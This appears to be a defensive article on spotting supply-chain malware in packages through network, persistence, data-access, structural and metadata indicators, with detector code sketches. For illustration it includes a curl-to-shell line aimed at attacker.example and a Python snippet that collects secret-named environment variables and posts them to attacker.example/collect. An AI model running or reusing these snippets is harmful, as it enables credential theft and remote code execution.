The Limits of Signature Detection
Signature-based malware scanning works by matching code against known patterns: a hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued, and ineffective for everything else.
Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.
The detection gap: between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window between first deployment and detection is measured in hours, long enough to exfiltrate credentials from every CI run in that period.
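To make the evasion concrete, here is a minimal sketch of hash-based matching. The signature set and the payload strings are invented for illustration and do not come from any real scanner or database.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of catalogued payloads.
KNOWN_PAYLOAD = b"curl https://attacker.example/x.sh | sh"
SIGNATURES = {hashlib.sha256(KNOWN_PAYLOAD).hexdigest()}


def matches_signature(payload: bytes) -> bool:
    """Return True if the payload's digest is in the signature database."""
    return hashlib.sha256(payload).hexdigest() in SIGNATURES


# Same behaviour, one extra space: the digest no longer matches.
variant = b"curl  https://attacker.example/x.sh | sh"

print(matches_signature(KNOWN_PAYLOAD))  # True
print(matches_signature(variant))        # False
```

A single changed byte is enough to produce a different digest, which is why per-campaign variants slip past exact-match signatures.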
Network Behaviour Indicators
Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:
- Hardcoded external URLs in unexpected contexts: a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
- Dynamic URL construction: building URLs from string concatenation or encoding rather than using explicit constants
- DNS-based communication: dns.resolve(), getaddrinfo() calls with data-derived hostnames
- Network calls in lifecycle hooks: any outbound call in postinstall, class constructors, module initialisation, or process exit handlers
- Unconditional background requests: requests that fire regardless of application logic, especially on startup
```javascript
// Red flag: network call executes at module load time,
// before any application code runs
const { hostname } = require('os');
const https = require('https');

// Immediately invoked: runs as a side effect of require()
(() => {
  https
    .get(`https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}`)
    // https.get() returns a ClientRequest, not a Promise, so failures
    // are silenced with an 'error' listener rather than .catch()
    .on('error', () => {});
})();
```
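One way to surface the first indicator is to extract every hardcoded URL from a package's source text and compare the hostnames against an allowlist. The sketch below assumes a hypothetical `unexpected_hosts` helper and a caller-supplied allowlist. The regular expression is deliberately rough, and it will not catch dynamically constructed URLs.

```python
import re
from urllib.parse import urlparse

# Rough URL matcher: stops at whitespace, quotes, backticks, and closing parens.
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def unexpected_hosts(source: str, allowed_hosts: set[str]) -> list[str]:
    """Return hostnames found in source text that are not on the allowlist."""
    found = set()
    for url in URL_RE.findall(source):
        try:
            host = urlparse(url).hostname
        except ValueError:
            continue  # malformed URL fragment: skip rather than crash
        if host and host not in allowed_hosts:
            found.add(host)
    return sorted(found)


sample = """
const res = await fetch('https://registry.npmjs.org/left-pad');
https.get(`https://telemetry.example.com/ping?h=${hostname()}`);
"""
print(unexpected_hosts(sample, allowed_hosts={"registry.npmjs.org"}))
# ['telemetry.example.com']
```

Because it works on raw text, the same scan applies to JavaScript, Python, or shell sources alike.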
Persistence Indicators
Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:
- Cron job creation: writing to /etc/cron.d/, crontab -e, or using OS scheduling APIs
- Shell profile modification: writes to ~/.bashrc, ~/.profile, ~/.zshrc
- Startup service registration: writing systemd unit files, launchd plists, or Windows registry run keys
- npm global script injection: modifying the ~/.npmrc scripts section
- Git hook installation: writing to the .git/hooks/ directory in the checked-out repository
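Several of these mechanisms leave recognisable path strings in source code. The following sketch greps for them. The pattern table and the `persistence_hits` name are illustrative assumptions, and the systemd and launchd paths in particular are common defaults chosen for the example, not an exhaustive list.

```python
import re

# Illustrative patterns only; real persistence locations vary by platform.
PERSISTENCE_PATTERNS = {
    "cron": re.compile(r"/etc/cron\.d/|\bcrontab\b"),
    "shell profile": re.compile(r"~?/\.(bashrc|profile|zshrc)\b"),
    "startup service": re.compile(r"/etc/systemd/system/|LaunchAgents|LaunchDaemons"),
    "git hook": re.compile(r"\.git/hooks/"),
}


def persistence_hits(source: str) -> list[str]:
    """Return the names of persistence categories referenced in source text."""
    return [name for name, pattern in PERSISTENCE_PATTERNS.items()
            if pattern.search(source)]


sample = (
    'fs.appendFileSync(os.homedir() + "/.bashrc", payload);\n'
    'fs.writeFileSync(".git/hooks/pre-commit", hook);\n'
)
print(persistence_hits(sample))  # ['shell profile', 'git hook']
```

A hit is a prompt for review, not a verdict: installers and dotfile managers write to these locations legitimately.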
Data Access Indicators
What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:
- Environment variable mass collection: iterating all environment variables rather than accessing specific named ones
- Credential file access: reading ~/.aws/credentials, ~/.ssh/id_rsa, ~/.npmrc, ~/.docker/config.json
- Browser data access: reading browser cookie files, saved passwords, or local storage
- Clipboard access: reading system clipboard content (cryptocurrency wallet address replacement)
- Keylogging APIs: hooking keyboard events at the OS level
```python
import json
import os
import urllib.request

# Mass environment variable sweep: high-confidence malware indicator
sensitive = {
    k: v for k, v in os.environ.items()
    if any(kw in k.lower() for kw in
           ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api'])
}

urllib.request.urlopen(
    'https://attacker.example/collect',
    data=json.dumps(sensitive).encode()
)
```
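The distinction between enumerating the environment and reading a named variable can be checked mechanically. This sketch uses Python's `ast` module to flag code that iterates or copies `os.environ`. The function names are hypothetical, and it only recognises the literal spelling `os.environ`, so aliased imports would slip through.

```python
import ast


def _is_os_environ(node: ast.AST) -> bool:
    """True for the expression `os.environ` (no alias handling)."""
    return (isinstance(node, ast.Attribute) and node.attr == "environ"
            and isinstance(node.value, ast.Name) and node.value.id == "os")


def sweeps_environment(source: str) -> bool:
    """True if the code enumerates os.environ rather than reading named keys."""
    for node in ast.walk(ast.parse(source)):
        # os.environ.items() / .keys() / .values() / .copy()
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr in {"items", "keys", "values", "copy"}
                and _is_os_environ(node.func.value)):
            return True
        # `for k in os.environ:` and comprehensions over os.environ
        if isinstance(node, (ast.For, ast.comprehension)) and _is_os_environ(node.iter):
            return True
    return False


print(sweeps_environment("import os\nd = {k: v for k, v in os.environ.items()}"))  # True
print(sweeps_environment("import os\nhome = os.environ.get('HOME')"))              # False
```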
Structural Code Anomalies
Malicious code often has structural characteristics that differ from legitimate code:
- Seemingly unreachable code following legitimate logic: blocks that look dead but that a static analyser doesn't flag as dead because they're conditionally executed
- Asymmetric function complexity: one function that is dramatically more complex than everything else in the file
- Comment-code ratio outliers: malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
- String-heavy code without surrounding context: large string constants that have no obvious relationship to the function they appear in
- Unexpected imports: a library that processes images importing network and process execution modules
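Asymmetric complexity is one of the easier anomalies to approximate. The sketch below uses AST node count as a crude stand-in for complexity and flags functions far above the file's median. The `complexity_outliers` name, the node-count metric, and the 5x ratio are all assumptions chosen for illustration.

```python
import ast
from statistics import median


def complexity_outliers(source: str, ratio: float = 5.0) -> list[str]:
    """Return names of functions whose AST size exceeds ratio x the file median."""
    tree = ast.parse(source)
    sizes = {
        node.name: sum(1 for _ in ast.walk(node))  # node count as a size proxy
        for node in ast.walk(tree)
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))
    }
    if len(sizes) < 3:
        return []  # too few functions for a meaningful baseline
    typical = median(sizes.values())
    return sorted(name for name, size in sizes.items() if size > ratio * typical)


small = "".join(f"def f{i}(x):\n    return x\n" for i in range(3))
big = "def big(x):\n" + "".join(f"    x = x + {i} * 2 - 1\n" for i in range(30)) + "    return x\n"
print(complexity_outliers(small + big))  # ['big']
```

A real tool would more likely use cyclomatic complexity, but the outlier logic stays the same.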
Contextual and Metadata Signals
Beyond the code itself, metadata provides high-signal indicators:
- New package with high download velocity: organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
- Package published immediately before a CI run: coordinated attacks time publication to coincide with known CI schedules
- Maintainer account age vs. package age: a maintainer account created days before publishing a popular-seeming package
- Mismatch between package description and actual code: a package claiming to be a utility library that imports network and process modules
- Empty or minimal source repository: a published package with no corresponding public source repository, or a repository with one commit
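The account-age signal reduces to a date comparison once the two timestamps are available. This is a minimal sketch: the function name and the seven-day threshold are assumptions, and fetching the timestamps from a registry is left out.

```python
from datetime import datetime, timedelta


def maintainer_is_suspiciously_new(
    account_created: datetime,
    first_published: datetime,
    threshold: timedelta = timedelta(days=7),  # assumed cut-off, tune per registry
) -> bool:
    """True if the package was published shortly after the account was created."""
    return first_published - account_created < threshold


print(maintainer_is_suspiciously_new(datetime(2024, 1, 1), datetime(2024, 1, 3)))  # True
print(maintainer_is_suspiciously_new(datetime(2020, 1, 1), datetime(2024, 1, 3)))  # False
```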
Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination (network call + environment variable access + new package + no source repository) that builds a high-confidence malware classification.
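A simple way to encode this is to count independent signals and only escalate when several coincide. The sketch below is one possible shape. The `Signals` fields mirror the four indicators named above, while the thresholds and labels are arbitrary assumptions.

```python
from dataclasses import dataclass


@dataclass
class Signals:
    network_call: bool = False
    env_sweep: bool = False
    new_package: bool = False
    no_source_repo: bool = False


def classify(signals: Signals) -> str:
    """Map the number of co-occurring signals to a coarse verdict."""
    count = sum([signals.network_call, signals.env_sweep,
                 signals.new_package, signals.no_source_repo])
    if count >= 3:
        return "high-confidence"  # assumed threshold
    if count == 2:
        return "review"
    return "low"


print(classify(Signals(network_call=True)))            # low
print(classify(Signals(True, True, True, True)))       # high-confidence
```

Equal weighting keeps the example short; in practice some signals would likely deserve more weight than others.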